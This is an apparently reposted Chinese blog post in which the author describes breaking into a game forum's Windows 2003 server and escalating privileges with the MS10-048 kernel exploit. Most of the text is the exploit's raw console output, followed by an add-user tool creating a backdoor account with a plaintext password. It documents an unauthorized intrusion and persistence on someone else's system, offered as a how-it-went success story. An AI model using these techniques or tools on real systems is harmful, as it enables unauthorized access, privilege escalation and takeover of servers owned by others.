• MS10048依旧是Windows 2003 x86 的杀器


    今天搞了个wow的游戏论坛,服务器环境是win03 x86+iis6.0+php+mysql。

    提权的时候各种无奈,mysql无权限,而且没root,试了几个别的方法都不行,实在没办法的时候,用MS10048试了下,成功了。

    Dojibiron by Ronald Huizer, (c) master#h4cker.us  
    
    [ ] Trying to allocate a page at NULL.
        [+] Allocated page at 0x0000000000000000 for 0x0000000000000001
    [ ] Bootstrapping kernel resolver.
        Module ntoskrnl.exe at 0x0000000000BD0000
        Base of driver: 0xFFFFF80001000000
        [+] Success.
    [ ] Resolving PsReferencePrimaryToken
        [+] Success: 0xFFFFF8000129FE50
    [ ] Resolving PsInitialSystemProcess
        [+] Success: 0xFFFFF800011D1FB0
    [ ] Resolving PsLookupProcessByProcessId
        [+] Success: 0xFFFFF80001288BC0
    [ ] Resolving PsDereferencePrimaryToken
        [+] Success: 0xFFFFF80001311B40
    [+] Handle table retrieval succeeded.
        Userspace handle table: 0x00000000006B0000
        Kernelspace handle table: 0xFFFFF97FF7990000
        Handle table entries: 1024
    [ ] Allocating fake HEAD page.
        [+] Allocated page at 0x0000000004000000 for 0x00000000040001FF
    [ ] Setting up CBT filter hook.
        [+] Success.
    [ ] Creating evil window
        [+] Success.
    [ ] Destroyed handle at: 0xFFFFF97FF7990FC0
        pHead:	0xFFFFF97FF906BA00
        pOwner:	0xFFFFFA80000E8D80
        bType:	0x01 - TYPE_WINDOW
        bFlags:	0x00 - 
        wUniq:	0x0004
    [ ] Trigger handle at: 0xFFFFF97FF7995AC0
        pHead:	0xFFFFF97FF90900A0
        pOwner:	0xFFFFFA80000E8D80
        bType:	0x01 - TYPE_WINDOW
        bFlags:	0x00 - 
        wUniq:	0x0003
    [ ] Writing pool addr to: 0xFFFFF97FF7990F7F
    
    	~ MS10_048 X64 EXP        ~
    
    	Need a girl to love   QQ 65665651 email master#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
    	QQ 65665651 email master#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
    	aster#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
    	01010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
    	0101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
    	1001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
    	111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
    	00000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
    	111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
    	011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
    	0101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
    	10101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
    	1001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
    	11111111110101010101111010101110101010101010101010101010111100000000000110
    	110101010101010101010101010111100000000000110
    	111100000000000110
    	0000110
    [ ] Checking the success flag.
        [+] Set to 2 exploit half succeeded
    [ ] Destroying trigger window
        pHead:	0x00000000000003CA
        pOwner:	0x0000000000000000
        bType:	0x00 - TYPE_FREE
        bFlags:	0x00 - 
        wUniq:	0x0004
    [ ] Spawning half a shell...
        Command: D:RECYCLERadd.exe
    [+] Enjoy!
              ==========================================
    
                  Api Add User Made By Cond0r
    
                        2011.3.20
                  Adduser.exe UserName PassWord Group
              ==========================================
    	 User List:
    
    	-->  7ksf
    	-->  ASPNET
    	-->  Guestasdfa
    	-->  IUSR_NJXW-12-5-2
    	-->  IWAM_NJXW-12-5-2
    	-->  SUPPORT_388945a0
    
    
    
    	Group List:
    
    	 --> Administrators 
    	 --> Backup Operators 
    	 --> Distributed COM Users 
    	 --> Guests 
    	 --> Network Configuration Operators 
    	 --> Performance Log Users 
    	 --> Performance Monitor Users 
    	 --> Power Users 
    	 --> Print Operators 
    	 --> Remote Desktop Users 
    	 --> Replicator 
    	 --> Users 
    	 --> HelpServicesGroup 
    	 --> IIS_WPG 
    	 --> TelnetClients 
    
     SuccessFul !!User "Cond0r" Pass "123!@#asdASD" Add User SuccessFul !!

    利用api加用户工具,成功添加cond0r密码为123!@#asdASD的账户


  • 相关阅读:
    黑马day07 注册案例(二)
    LeetCode--Best Time to Buy and Sell Stock (贪心策略 or 动态规划)
    让UIView窄斜
    Android Material Design-Creating Lists and Cards(创建列表和卡)-(三)
    c#为了实现自己的线程池功能(一)
    4、应用程序设置应用程序详细信息页面
    【NIO】dawn在buffer用法
    《ArcGIS Runtime SDK for .NET开发笔记》--在线编辑
    ArcGIS Runtime SDK for .NET (Quartz Beta)之连接ArcGIS Portal
    《ArcGIS Runtime SDK for .NET开发笔记》--三维功能
  • 原文地址:https://www.cnblogs.com/hookjoy/p/3608694.html
走看看 - 开发者的网上家园